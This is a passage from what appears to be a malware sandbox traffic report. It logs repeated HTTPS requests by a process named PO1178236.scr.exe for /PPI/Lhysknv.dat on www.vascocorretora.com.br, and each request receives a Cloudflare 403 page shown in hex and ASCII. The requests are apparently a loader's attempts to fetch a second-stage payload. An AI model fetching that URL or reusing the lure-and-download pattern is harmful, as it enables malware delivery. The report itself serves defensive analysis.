3a 68 69 64 64 65 6e 22 3e 26 62 75 6c 6c 3b
        Data Ascii: rder-solid border-0 border-t border-gray-300"> <p class="text-13"> <span class="cf-footer-item sm:block sm:mb-1">Cloudflare Ray ID: <strong class="font-semibold">8ff2c2d00f7343bd</strong></span> <span class="cf-footer-separator sm:hidden">&bull;
        2025-01-09 07:37:15 UTC992INData Raw: 5f 74 72 61 6e 73 6c 61 74 69 6f 6e 20 3d 20 7b 7d 3b 0a 20 20 0a 20 20 0a 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 63 28 29 7b 76 61 72 20 62 3d 61 2e 63 6f 6e 74 65 6e 74 44 6f 63 75 6d 65 6e 74 7c 7c 61 2e 63 6f 6e 74 65 6e 74 57 69 6e 64 6f 77 2e 64 6f 63 75 6d 65 6e 74 3b 69 66 28 62 29 7b 76 61 72 20 64 3d 62 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 27 73 63 72 69 70 74 27 29 3b 64 2e 69 6e 6e 65 72 48 54 4d 4c 3d 22 77 69 6e 64 6f 77 2e 5f 5f 43 46 24 63 76 24 70 61 72 61 6d 73 3d 7b 72 3a 27 38 66 66 32 63 32 64 30 30 66 37 33 34 33 62 64 27 2c 74 3a 27 4d 54 63 7a 4e 6a 51 77 4f 44 49 7a 4e 53 34 77 4d 44 41 77 4d 44 41 3d 27 7d 3b 76 61 72 20 61 3d 64 6f 63 75 6d
        Data Ascii: _translation = {}; </script><script>(function(){function c(){var b=a.contentDocument||a.contentWindow.document;if(b){var d=b.createElement('script');d.innerHTML="window.__CF$cv$params={r:'8ff2c2d00f7343bd',t:'MTczNjQwODIzNS4wMDAwMDA='};var a=docum
        2025-01-09 07:37:15 UTC5INData Raw: 30 0d 0a 0d 0a
        Data Ascii: 0


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        129192.168.2.949838188.114.96.34437668C:\Users\user\Desktop\PO1178236.scr.exe
        TimestampBytes transferredDirectionData
        2025-01-09 07:37:16 UTC66OUTGET /PPI/Lhysknv.dat HTTP/1.1
        Host: www.vascocorretora.com.br
        2025-01-09 07:37:16 UTC1013INHTTP/1.1 403 Forbidden
        Date: Thu, 09 Jan 2025 07:37:16 GMT
        Content-Type: text/html; charset=UTF-8
        Transfer-Encoding: chunked
        Connection: close
        Cache-Control: max-age=15
        Expires: Thu, 09 Jan 2025 07:37:31 GMT
        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=877wZfM%2B0lQzhGp35ijRKyY0K%2BTnOqQUN1L07Fu3hSrDZfvl0ElbDIsgaRTO4%2BTb4ZWtAqd0u0bQlA0ZDd8AHonGUrk%2FAgh35%2BM2dH0I9Le2RDl2%2BveGAhdCD4MpjdQLMC4y2lP%2BQGSt1oq2"}],"group":"cf-nel","max_age":604800}
        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
        expect-ct: max-age=86400, enforce
        referrer-policy: same-origin
        x-content-type-options: nosniff
        x-frame-options: SAMEORIGIN
        x-xss-protection: 1; mode=block
        Server: cloudflare
        CF-RAY: 8ff2c2d3d9ce8c17-EWR
        alt-svc: h3=":443"; ma=86400
        server-timing: cfL4;desc="?proto=TCP&rtt=1960&min_rtt=1949&rtt_var=753&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2854&recv_bytes=704&delivery_rate=1433480&cwnd=231&unsent_bytes=0&cid=b1ce408ddcceed83&ts=146&x=0"
        2025-01-09 07:37:16 UTC356INData Raw: 31 35 35 35 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20
        Data Ascii: 1555<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
        2025-01-09 07:37:16 UTC1369INData Raw: 20 43 6c 6f 75 64 66 6c 61 72 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69
        Data Ascii: Cloudflare</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge" /><meta name="robots" content="noindex, nofollow" /><meta name="viewport" content="wi
        2025-01-09 07:37:16 UTC1369INData Raw: 65 63 74 69 6f 6e 20 63 66 2d 68 69 67 68 6c 69 67 68 74 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 77 72 61 70 70 65 72 22 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 73 63 72 65 65 6e 73 68 6f 74 2d 63 6f 6e 74 61 69 6e 65 72 20 63 66 2d 73 63 72 65 65 6e 73 68 6f 74 2d 66 75 6c 6c 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 6e 6f 2d 73 63 72 65 65 6e 73 68 6f 74 20 65 72 72 6f 72 22 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 3c 2f 64 69 76 3e 3c 21 2d 2d
        Data Ascii: ection cf-highlight"> <div class="cf-wrapper"> <div class="cf-screenshot-container cf-screenshot-full"> <span class="cf-no-screenshot error"></span> </div> </div> </div>...
        2025-01-09 07:37:16 UTC1369INData Raw: 6d 3a 74 65 78 74 2d 6c 65 66 74 20 62 6f 72 64 65 72 2d 73 6f 6c 69 64 20 62 6f 72 64 65 72 2d 30 20 62 6f 72 64 65 72 2d 74 20 62 6f 72 64 65 72 2d 67 72 61 79 2d 33 30 30 22 3e 0a 20 20 3c 70 20 63 6c 61 73 73 3d 22 74 65 78 74 2d 31 33 22 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 20 73 6d 3a 62 6c 6f 63 6b 20 73 6d 3a 6d 62 2d 31 22 3e 43 6c 6f 75 64 66 6c 61 72 65 20 52 61 79 20 49 44 3a 20 3c 73 74 72 6f 6e 67 20 63 6c 61 73 73 3d 22 66 6f 6e 74 2d 73 65 6d 69 62 6f 6c 64 22 3e 38 66 66 32 63 32 64 33 64 39 63 65 38 63 31 37 3c 2f 73 74 72 6f 6e 67 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 73 65 70 61 72 61 74 6f 72 20 73 6d 3a
        Data Ascii: m:text-left border-solid border-0 border-t border-gray-300"> <p class="text-13"> <span class="cf-footer-item sm:block sm:mb-1">Cloudflare Ray ID: <strong class="font-semibold">8ff2c2d3d9ce8c17</strong></span> <span class="cf-footer-separator sm:
        2025-01-09 07:37:16 UTC1006INData Raw: 3e 0a 20 20 77 69 6e 64 6f 77 2e 5f 63 66 5f 74 72 61 6e 73 6c 61 74 69 6f 6e 20 3d 20 7b 7d 3b 0a 20 20 0a 20 20 0a 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 63 28 29 7b 76 61 72 20 62 3d 61 2e 63 6f 6e 74 65 6e 74 44 6f 63 75 6d 65 6e 74 7c 7c 61 2e 63 6f 6e 74 65 6e 74 57 69 6e 64 6f 77 2e 64 6f 63 75 6d 65 6e 74 3b 69 66 28 62 29 7b 76 61 72 20 64 3d 62 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 27 73 63 72 69 70 74 27 29 3b 64 2e 69 6e 6e 65 72 48 54 4d 4c 3d 22 77 69 6e 64 6f 77 2e 5f 5f 43 46 24 63 76 24 70 61 72 61 6d 73 3d 7b 72 3a 27 38 66 66 32 63 32 64 33 64 39 63 65 38 63 31 37 27 2c 74 3a 27 4d 54 63 7a 4e 6a 51 77 4f 44 49 7a 4e 69 34 77 4d 44 41 77 4d 44 41 3d
        Data Ascii: > window._cf_translation = {}; </script><script>(function(){function c(){var b=a.contentDocument||a.contentWindow.document;if(b){var d=b.createElement('script');d.innerHTML="window.__CF$cv$params={r:'8ff2c2d3d9ce8c17',t:'MTczNjQwODIzNi4wMDAwMDA=
        2025-01-09 07:37:16 UTC5INData Raw: 30 0d 0a 0d 0a
        Data Ascii: 0


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        130192.168.2.949839188.114.96.34437668C:\Users\user\Desktop\PO1178236.scr.exe
        TimestampBytes transferredDirectionData
        2025-01-09 07:37:16 UTC66OUTGET /PPI/Lhysknv.dat HTTP/1.1
        Host: www.vascocorretora.com.br
        2025-01-09 07:37:16 UTC1009INHTTP/1.1 403 Forbidden
        Date: Thu, 09 Jan 2025 07:37:16 GMT
        Content-Type: text/html; charset=UTF-8
        Transfer-Encoding: chunked
        Connection: close
        Cache-Control: max-age=15
        Expires: Thu, 09 Jan 2025 07:37:31 GMT
        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=C9Y%2BHBnbuqey1K7RvDTUjsDBHKOsRoZodvX8MIM0rfQBcP8oKEgN5ZaG3DYaU7RyQ1Im8AA%2BX%2BJ3ej51WkseFiDt2u8VHrY%2FD5rG5wkQOJcMtdmvt8SaTHIBaICu8ys%2FmHe4ta6cDZ9YfFE8"}],"group":"cf-nel","max_age":604800}
        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
        expect-ct: max-age=86400, enforce
        referrer-policy: same-origin
        x-content-type-options: nosniff
        x-frame-options: SAMEORIGIN
        x-xss-protection: 1; mode=block
        Server: cloudflare
        CF-RAY: 8ff2c2d79edf4255-EWR
        alt-svc: h3=":443"; ma=86400
        server-timing: cfL4;desc="?proto=TCP&rtt=2162&min_rtt=2149&rtt_var=833&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2853&recv_bytes=704&delivery_rate=1293179&cwnd=225&unsent_bytes=0&cid=c1ac1566299157b1&ts=138&x=0"
        2025-01-09 07:37:16 UTC360INData Raw: 31 35 35 35 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20
        Data Ascii: 1555<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
        2025-01-09 07:37:16 UTC1369INData Raw: 75 64 66 6c 61 72 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d
        Data Ascii: udflare</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge" /><meta name="robots" content="noindex, nofollow" /><meta name="viewport" content="width=
        2025-01-09 07:37:16 UTC1369INData Raw: 6f 6e 20 63 66 2d 68 69 67 68 6c 69 67 68 74 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 77 72 61 70 70 65 72 22 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 73 63 72 65 65 6e 73 68 6f 74 2d 63 6f 6e 74 61 69 6e 65 72 20 63 66 2d 73 63 72 65 65 6e 73 68 6f 74 2d 66 75 6c 6c 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 6e 6f 2d 73 63 72 65 65 6e 73 68 6f 74 20 65 72 72 6f 72 22 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 3c 2f 64 69 76 3e 3c 21 2d 2d 20 2f 2e 63
        Data Ascii: on cf-highlight"> <div class="cf-wrapper"> <div class="cf-screenshot-container cf-screenshot-full"> <span class="cf-no-screenshot error"></span> </div> </div> </div>... /.c
        2025-01-09 07:37:16 UTC1369INData Raw: 78 74 2d 6c 65 66 74 20 62 6f 72 64 65 72 2d 73 6f 6c 69 64 20 62 6f 72 64 65 72 2d 30 20 62 6f 72 64 65 72 2d 74 20 62 6f 72 64 65 72 2d 67 72 61 79 2d 33 30 30 22 3e 0a 20 20 3c 70 20 63 6c 61 73 73 3d 22 74 65 78 74 2d 31 33 22 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 20 73 6d 3a 62 6c 6f 63 6b 20 73 6d 3a 6d 62 2d 31 22 3e 43 6c 6f 75 64 66 6c 61 72 65 20 52 61 79 20 49 44 3a 20 3c 73 74 72 6f 6e 67 20 63 6c 61 73 73 3d 22 66 6f 6e 74 2d 73 65 6d 69 62 6f 6c 64 22 3e 38 66 66 32 63 32 64 37 39 65 64 66 34 32 35 35 3c 2f 73 74 72 6f 6e 67 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 73 65 70 61 72 61 74 6f 72 20 73 6d 3a 68 69 64 64
        Data Ascii: xt-left border-solid border-0 border-t border-gray-300"> <p class="text-13"> <span class="cf-footer-item sm:block sm:mb-1">Cloudflare Ray ID: <strong class="font-semibold">8ff2c2d79edf4255</strong></span> <span class="cf-footer-separator sm:hidd
        2025-01-09 07:37:16 UTC1002INData Raw: 77 69 6e 64 6f 77 2e 5f 63 66 5f 74 72 61 6e 73 6c 61 74 69 6f 6e 20 3d 20 7b 7d 3b 0a 20 20 0a 20 20 0a 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 63 28 29 7b 76 61 72 20 62 3d 61 2e 63 6f 6e 74 65 6e 74 44 6f 63 75 6d 65 6e 74 7c 7c 61 2e 63 6f 6e 74 65 6e 74 57 69 6e 64 6f 77 2e 64 6f 63 75 6d 65 6e 74 3b 69 66 28 62 29 7b 76 61 72 20 64 3d 62 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 27 73 63 72 69 70 74 27 29 3b 64 2e 69 6e 6e 65 72 48 54 4d 4c 3d 22 77 69 6e 64 6f 77 2e 5f 5f 43 46 24 63 76 24 70 61 72 61 6d 73 3d 7b 72 3a 27 38 66 66 32 63 32 64 37 39 65 64 66 34 32 35 35 27 2c 74 3a 27 4d 54 63 7a 4e 6a 51 77 4f 44 49 7a 4e 69 34 77 4d 44 41 77 4d 44 41 3d 27 7d 3b 76
        Data Ascii: window._cf_translation = {}; </script><script>(function(){function c(){var b=a.contentDocument||a.contentWindow.document;if(b){var d=b.createElement('script');d.innerHTML="window.__CF$cv$params={r:'8ff2c2d79edf4255',t:'MTczNjQwODIzNi4wMDAwMDA='};v
        2025-01-09 07:37:16 UTC5INData Raw: 30 0d 0a 0d 0a
        Data Ascii: 0


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        131192.168.2.949840188.114.96.34437668C:\Users\user\Desktop\PO1178236.scr.exe
        TimestampBytes transferredDirectionData
        2025-01-09 07:37:17 UTC66OUTGET /PPI/Lhysknv.dat HTTP/1.1
        Host: www.vascocorretora.com.br
        2025-01-09 07:37:17 UTC1001INHTTP/1.1 403 Forbidden
        Date: Thu, 09 Jan 2025 07:37:17 GMT
        Content-Type: text/html; charset=UTF-8
        Transfer-Encoding: chunked
        Connection: close
        Cache-Control: max-age=15
        Expires: Thu, 09 Jan 2025 07:37:32 GMT
        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jZQyUa4%2FzCt8W3Q3aPDunwYNtvwLLHsJ8M8MGJOypxG92SVesnWLHmU0yi4HKAY5kVCn41CKlDCIaR3VMvZIac55Zo65gwAYf7Fdliafs9S86cPB4CiE56MmVQYci1f8hFLjZ3xk84c9NS6F"}],"group":"cf-nel","max_age":604800}
        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
        expect-ct: max-age=86400, enforce
        referrer-policy: same-origin
        x-content-type-options: nosniff
        x-frame-options: SAMEORIGIN
        x-xss-protection: 1; mode=block
        Server: cloudflare
        CF-RAY: 8ff2c2db6ef4c34b-EWR
        alt-svc: h3=":443"; ma=86400
        server-timing: cfL4;desc="?proto=TCP&rtt=1458&min_rtt=1450&rtt_var=560&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2855&recv_bytes=704&delivery_rate=1923583&cwnd=172&unsent_bytes=0&cid=799c699e9f31c6d1&ts=142&x=0"
        2025-01-09 07:37:17 UTC368INData Raw: 31 35 35 35 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20
        Data Ascii: 1555<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
        2025-01-09 07:37:17 UTC1369INData Raw: 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77
        Data Ascii: /title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge" /><meta name="robots" content="noindex, nofollow" /><meta name="viewport" content="width=device-w
        2025-01-09 07:37:17 UTC1369INData Raw: 67 68 6c 69 67 68 74 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 77 72 61 70 70 65 72 22 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 73 63 72 65 65 6e 73 68 6f 74 2d 63 6f 6e 74 61 69 6e 65 72 20 63 66 2d 73 63 72 65 65 6e 73 68 6f 74 2d 66 75 6c 6c 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 6e 6f 2d 73 63 72 65 65 6e 73 68 6f 74 20 65 72 72 6f 72 22 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 3c 2f 64 69 76 3e 3c 21 2d 2d 20 2f 2e 63 61 70 74 63 68 61 2d 63
        Data Ascii: ghlight"> <div class="cf-wrapper"> <div class="cf-screenshot-container cf-screenshot-full"> <span class="cf-no-screenshot error"></span> </div> </div> </div>... /.captcha-c
        2025-01-09 07:37:17 UTC1369INData Raw: 62 6f 72 64 65 72 2d 73 6f 6c 69 64 20 62 6f 72 64 65 72 2d 30 20 62 6f 72 64 65 72 2d 74 20 62 6f 72 64 65 72 2d 67 72 61 79 2d 33 30 30 22 3e 0a 20 20 3c 70 20 63 6c 61 73 73 3d 22 74 65 78 74 2d 31 33 22 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 20 73 6d 3a 62 6c 6f 63 6b 20 73 6d 3a 6d 62 2d 31 22 3e 43 6c 6f 75 64 66 6c 61 72 65 20 52 61 79 20 49 44 3a 20 3c 73 74 72 6f 6e 67 20 63 6c 61 73 73 3d 22 66 6f 6e 74 2d 73 65 6d 69 62 6f 6c 64 22 3e 38 66 66 32 63 32 64 62 36 65 66 34 63 33 34 62 3c 2f 73 74 72 6f 6e 67 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 73 65 70 61 72 61 74 6f 72 20 73 6d 3a 68 69 64 64 65 6e 22 3e 26 62 75 6c
        Data Ascii: border-solid border-0 border-t border-gray-300"> <p class="text-13"> <span class="cf-footer-item sm:block sm:mb-1">Cloudflare Ray ID: <strong class="font-semibold">8ff2c2db6ef4c34b</strong></span> <span class="cf-footer-separator sm:hidden">&bul
        2025-01-09 07:37:17 UTC994INData Raw: 63 66 5f 74 72 61 6e 73 6c 61 74 69 6f 6e 20 3d 20 7b 7d 3b 0a 20 20 0a 20 20 0a 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 63 28 29 7b 76 61 72 20 62 3d 61 2e 63 6f 6e 74 65 6e 74 44 6f 63 75 6d 65 6e 74 7c 7c 61 2e 63 6f 6e 74 65 6e 74 57 69 6e 64 6f 77 2e 64 6f 63 75 6d 65 6e 74 3b 69 66 28 62 29 7b 76 61 72 20 64 3d 62 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 27 73 63 72 69 70 74 27 29 3b 64 2e 69 6e 6e 65 72 48 54 4d 4c 3d 22 77 69 6e 64 6f 77 2e 5f 5f 43 46 24 63 76 24 70 61 72 61 6d 73 3d 7b 72 3a 27 38 66 66 32 63 32 64 62 36 65 66 34 63 33 34 62 27 2c 74 3a 27 4d 54 63 7a 4e 6a 51 77 4f 44 49 7a 4e 79 34 77 4d 44 41 77 4d 44 41 3d 27 7d 3b 76 61 72 20 61 3d 64 6f 63
        Data Ascii: cf_translation = {}; </script><script>(function(){function c(){var b=a.contentDocument||a.contentWindow.document;if(b){var d=b.createElement('script');d.innerHTML="window.__CF$cv$params={r:'8ff2c2db6ef4c34b',t:'MTczNjQwODIzNy4wMDAwMDA='};var a=doc
        2025-01-09 07:37:17 UTC5INData Raw: 30 0d 0a 0d 0a
        Data Ascii: 0


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        132192.168.2.949841188.114.96.34437668C:\Users\user\Desktop\PO1178236.scr.exe
        TimestampBytes transferredDirectionData
        2025-01-09 07:37:17 UTC66OUTGET /PPI/Lhysknv.dat HTTP/1.1
        Host: www.vascocorretora.com.br
        2025-01-09 07:37:18 UTC1009INHTTP/1.1 403 Forbidden
        Date: Thu, 09 Jan 2025 07:37:17 GMT
        Content-Type: text/html; charset=UTF-8
        Transfer-Encoding: chunked
        Connection: close
